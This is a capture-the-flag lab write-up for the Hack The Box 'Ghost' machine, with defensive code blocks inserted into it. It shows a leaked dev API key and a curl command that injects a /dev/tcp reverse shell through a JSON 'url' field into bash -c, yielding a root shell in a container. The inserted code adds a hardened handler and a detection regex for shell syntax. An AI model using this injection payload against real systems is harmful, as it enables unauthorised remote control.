RCE

/scan is the API endpoint; it sits under the dev API endpoint /api-dev, giving /api-dev/scan:
- It takes POST requests with JSON data
- User-supplied JSON data is EXECUTED via the bash -c command
- It's locked behind an API key; DEV_INTRANET_KEY
- It has already been retrieved via LFI; DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe
- Required header is X-DEV-INTRANET-KEY
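The pattern described above (a JSON "url" value handed to bash -c) is a textbook command injection. The following is an added example, not the intranet's real handler and not part of this write-up: a hypothetical reconstruction of what such a handler passes to the shell, a hardened version that validates the URL and never goes through a shell, and a coarse request-body check a defender could run over logged POST bodies. The function and constant names, and the sample bodies, are all constructed for the example.

```python
"""Added example (not from the write-up): why "url" -> bash -c is a command
injection, what a hardened scan handler looks like, and how to flag bodies
that carry shell syntax. The Ghost handler itself is not shown in the
write-up; build_command_unsafe is a hypothetical reconstruction only."""
import re
from urllib.parse import urlparse


def build_command_unsafe(url: str) -> list[str]:
    """Hypothetical vulnerable pattern: the user value is spliced into a
    string that bash parses. A ';' in the value ends the curl command and
    starts a second one. Nothing is executed here; the argv is returned so
    it can be inspected."""
    return ["bash", "-c", f"curl -s {url}"]


def build_command_safe(url: str) -> list[str]:
    """Hardened version: accept only well-formed http(s) URLs and pass the
    value as a single argv element (shell=False), so it is never parsed as
    shell syntax at all."""
    if re.search(r"[\s;&|<>`$(){}]", url):
        raise ValueError("shell metacharacters are not allowed")
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError("only http/https URLs are accepted")
    if not parsed.netloc or not re.fullmatch(r"[A-Za-z0-9.\-]+(:\d{1,5})?", parsed.netloc):
        raise ValueError("invalid host")
    # '--' keeps curl from treating a value starting with '-' as an option.
    return ["curl", "-s", "--", url]


# Coarse detection heuristic for logged request bodies: bash's /dev/tcp
# pseudo-device, command separators, command substitution, fd redirection
# and a bare exec. Tune for your own application's legitimate inputs.
INJECTION_PATTERNS = re.compile(r"/dev/tcp/|[;|`]|\$\(|<&|>&|\bexec\b")


def looks_like_injection(body: str) -> bool:
    """True if a POST body contains shell syntax that a URL never needs."""
    return bool(INJECTION_PATTERNS.search(body))


def flag_bodies(bodies: list[str]) -> list[str]:
    """Return the subset of logged bodies that trip the heuristic."""
    return [b for b in bodies if looks_like_injection(b)]


# Constructed sample bodies: one benign scan request and the payload shape
# shown in the write-up.
SAMPLE_BODIES = [
    '{"url": "http://intranet.ghost.htb:8008/"}',
    '{"url": "0<&196;exec 196<>/dev/tcp/10.10.14.58/9999; sh <&196 >&196 2>&196"}',
]


if __name__ == "__main__":
    print("unsafe argv:", build_command_unsafe("example.com;echo injected"))
    print("safe argv:  ", build_command_safe("http://intranet.ghost.htb:8008/"))
    print("flagged:    ", flag_bodies(SAMPLE_BODIES))
```

The hardened function still lets curl run; the point is that it runs with the URL as one argv element, so the API key gate (which the write-up shows was itself leaked via LFI) stops being the only thing standing between a request and a root shell.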
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ curl http://intranet.ghost.htb:8008/api-dev/scan -X POST -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url": "0<&196;exec 196<>/dev/tcp/10.10.14.58/9999; sh <&196 >&196 2>&196"}'
Sending the reverse shell payload
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.58] from (UNKNOWN) [10.10.11.24] 61100
whoami
root
hostname
621de11273cb
cat /proc/net/fib_trie
Main:
+-- 0.0.0.0/0 3 0 5
|-- 0.0.0.0
/0 universe UNICAST
+-- 127.0.0.0/8 2 0 2
+-- 127.0.0.0/31 1 0 0
|-- 127.0.0.0
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
/32 link BROADCAST
+-- 172.18.0.0/16 2 0 2
+-- 172.18.0.0/30 2 0 2
|-- 172.18.0.0
/16 link UNICAST
|-- 172.18.0.3
/32 host LOCAL
|-- 172.18.255.255
/32 link BROADCAST
Local:
+-- 0.0.0.0/0 3 0 5
|-- 0.0.0.0
/0 universe UNICAST
+-- 127.0.0.0/8 2 0 2
+-- 127.0.0.0/31 1 0 0
|-- 127.0.0.0
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
/32 link BROADCAST
+-- 172.18.0.0/16 2 0 2
+-- 172.18.0.0/30 2 0 2
|-- 172.18.0.0
/16 link UNICAST
|-- 172.18.0.3
/32 host LOCAL
|-- 172.18.255.255
/32 link BROADCAST
Initial foothold established on one of the Docker containers (172.18.0.3, read from /proc/net/fib_trie) as the root account via RCE.
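Reading /proc/net/fib_trie, as done above, is the usual fallback for learning a container's address when the image ships no ip or ifconfig binary. The following is an added example, not part of the write-up: a small parser that walks the trie and returns the addresses the kernel marks as "host LOCAL", so the container address can be picked out without eyeballing the tree. The sample text is constructed from the Main table shown in the session, with the indentation the kernel prints restored; the function names are assumptions.

```python
"""Added example (not from the write-up): extract the host's own IPv4
addresses from /proc/net/fib_trie output.

The trie prints each leaf as "|-- <addr>" followed by one or more detail
lines "/<prefix> <scope> <type>"; a detail line reading "host LOCAL" means
the address is assigned to this host."""
import re
from typing import List, Optional

# Constructed sample: the Main table from the session above. The kernel
# prints the same entries again under "Local:", so results are deduplicated.
SAMPLE_FIB_TRIE = """\
Main:
  +-- 0.0.0.0/0 3 0 5
     |-- 0.0.0.0
        /0 universe UNICAST
     +-- 127.0.0.0/8 2 0 2
        +-- 127.0.0.0/31 1 0 0
           |-- 127.0.0.0
              /8 host LOCAL
           |-- 127.0.0.1
              /32 host LOCAL
        |-- 127.255.255.255
           /32 link BROADCAST
     +-- 172.18.0.0/16 2 0 2
        +-- 172.18.0.0/30 2 0 2
           |-- 172.18.0.0
              /16 link UNICAST
           |-- 172.18.0.3
              /32 host LOCAL
        |-- 172.18.255.255
           /32 link BROADCAST
"""

LEAF = re.compile(r"^\s*\|-- (\d{1,3}(?:\.\d{1,3}){3})\s*$")
DETAIL = re.compile(r"^\s*/(\d{1,2}) (\S+) (\S+)\s*$")


def local_addresses(text: str) -> List[str]:
    """Every address with a 'host LOCAL' detail line, in order, deduplicated."""
    found: List[str] = []
    current: Optional[str] = None
    for line in text.splitlines():
        leaf = LEAF.match(line)
        if leaf:
            current = leaf.group(1)  # details that follow belong to this leaf
            continue
        detail = DETAIL.match(line)
        if detail and current is not None:
            _prefix, scope, kind = detail.groups()
            if scope == "host" and kind == "LOCAL" and current not in found:
                found.append(current)
    return found


def container_address(text: str) -> Optional[str]:
    """First non-loopback LOCAL address: the interface the shell landed on."""
    for addr in local_addresses(text):
        if not addr.startswith("127."):
            return addr
    return None


if __name__ == "__main__":
    try:
        with open("/proc/net/fib_trie") as fh:  # real file when run on Linux
            text = fh.read()
    except OSError:
        text = SAMPLE_FIB_TRIE
    print("local:", local_addresses(text))
    print("container:", container_address(text))
```

The same parse is handy on the defensive side: an incident responder pulling a minimal container image apart can recover its addressing from the proc filesystem alone, without any userland network tools in the image.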